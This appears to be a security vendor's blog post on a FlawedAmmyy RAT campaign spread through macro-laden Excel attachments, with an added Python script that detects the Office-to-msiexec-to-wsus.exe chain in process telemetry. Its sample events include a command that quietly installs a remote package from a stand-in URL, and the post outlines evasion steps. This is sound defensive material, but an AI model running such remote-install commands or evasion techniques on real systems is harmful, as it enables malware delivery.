Always be cautious when opening email attachments. Researchers recently reported a campaign in which attackers send weaponized Excel files that deliver the FlawedAmmyy remote access trojan (RAT). “When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory,” Microsoft notes in a thread about the threat.
That executable then downloads and decrypts a file called wsus.exe, named so that it passes for a component of Microsoft’s Windows Server Update Services (WSUS). The file was digitally signed on June 19 (a valid signature helps a loader slip past controls that trust signed code) and decrypts the final payload in memory, delivering the FlawedAmmyy RAT without writing it to disk.
This particular attack appears aimed at Korean-speaking Windows users, since the attachment contains Korean-language text.
The chain has also been designed to bypass certain Windows 10 defenses, such as Attack Surface Reduction (ASR) rules and the detection of dangerous file formats embedded via OLE. Getting an end user to open a bare executable directly is hard for the attackers, so they hide the first stage inside everyday attachments such as Excel and Word files, which people regard as harmless and open without a second thought.
According to security firm Proofpoint, the group known as TA505, which specialises in the mass distribution of malicious spam, is behind this campaign to spread the FlawedAmmyy RAT.
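The chain described above (an Office process launching msiexec.exe, msiexec.exe pulling a package from a remote location, and a wsus.exe lookalike running from a user profile) is visible in ordinary process-creation telemetry. The following is an added example of that detection logic; it is not code from Microsoft, Proofpoint or Logix Infosecurity. The event records are constructed to resemble Sysmon Event ID 1 (process creation) fields, and the field names, sample paths and hostnames are assumptions. The first indicator is the same parent/child relationship that the ASR rule “Block all Office applications from creating child processes” is meant to stop, so a hit on it also tells you that rule was not in enforce mode.

```python
"""Detection of the Excel -> msiexec.exe -> remote MSI -> wsus.exe chain.

Added example; not code from Microsoft, Proofpoint or Logix Infosecurity.
Event records are constructed to look like Sysmon Event ID 1 (process
creation) fields; field names, paths and hostnames are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office hosts whose child processes are worth scrutinising.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# msiexec can install straight from an HTTP(S) URL or a UNC path; a normal
# local install names a package on disk instead.
REMOTE_SOURCE = re.compile(r"(?i)(?:https?://|\\\\)[^\s\"']+")


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str   # command line of the new process


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: ProcessEvent) -> List[str]:
    """Return the names of the chain indicators this single event matches."""
    findings: List[str] = []
    parent, child = basename(event.parent_image), basename(event.image)

    # Stage 1: the macro in the .xls launches the Windows Installer.
    if parent in OFFICE_PARENTS and child == "msiexec.exe":
        findings.append("office-spawned-msiexec")

    # Stage 1, second signal: the installer is told to fetch a remote package.
    if child == "msiexec.exe" and REMOTE_SOURCE.search(event.command_line):
        findings.append("msiexec-remote-package")

    # Stage 2: a binary named after WSUS running out of a user profile.
    # Heuristic assumption: genuine Windows components do not run from there.
    if child == "wsus.exe" and "\\users\\" in event.image.lower():
        findings.append("wsus-lookalike-in-user-profile")

    return findings


def scan(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> findings, for events with at least one finding."""
    hits: Dict[int, List[str]] = {}
    for index, event in enumerate(events):
        findings = triage(event)
        if findings:
            hits[index] = findings
    return hits


# Constructed sample telemetry (not real logs); paths and hostnames are made up.
SAMPLE_EVENTS = [
    ProcessEvent(  # stage 1: macro in the .xls runs msiexec against a URL
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        image=r"C:\Windows\System32\msiexec.exe",
        command_line=r"msiexec.exe /i http://example.invalid/update.msi /q",
    ),
    ProcessEvent(  # benign: user runs a local installer from Explorer
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\msiexec.exe",
        command_line=r"msiexec.exe /i C:\Users\alice\Downloads\setup.msi",
    ),
    ProcessEvent(  # stage 2: the extracted signed executable starts wsus.exe
        parent_image=r"C:\Users\alice\AppData\Local\Temp\stage1.exe",
        image=r"C:\Users\alice\AppData\Local\Temp\wsus.exe",
        command_line=r"wsus.exe",
    ),
    ProcessEvent(  # benign: Excel spawning the print driver helper
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        image=r"C:\Windows\splwow64.exe",
        command_line=r"C:\Windows\splwow64.exe 12288",
    ),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx].image), findings)
```

Each indicator is deliberately weak on its own (users do run installers, and Excel does spawn helper processes), which is why `triage` returns all matching indicators rather than a single verdict: an Office parent plus a remote package source on the same msiexec.exe event, followed shortly by a wsus.exe start under a user profile, is the pattern worth escalating.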
Microsoft says that Microsoft Threat Protection defends customers from this attack. “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign,” the company notes.
Advanced threat protection is essential to avoid such attacks. Logix Infosecurity deploys the latest email security and advanced threat protection software so that critical confidential data stays safe, and we continuously update it as cyber criminals change their methods. Our Cloud Email Advanced Threat Protection service accurately detects email-borne threats such as ransomware, BEC, domain spoofing, advanced malware, spear phishing and display name spoofing. Security is an evolving process, so you must always keep abreast of the latest trends and updates.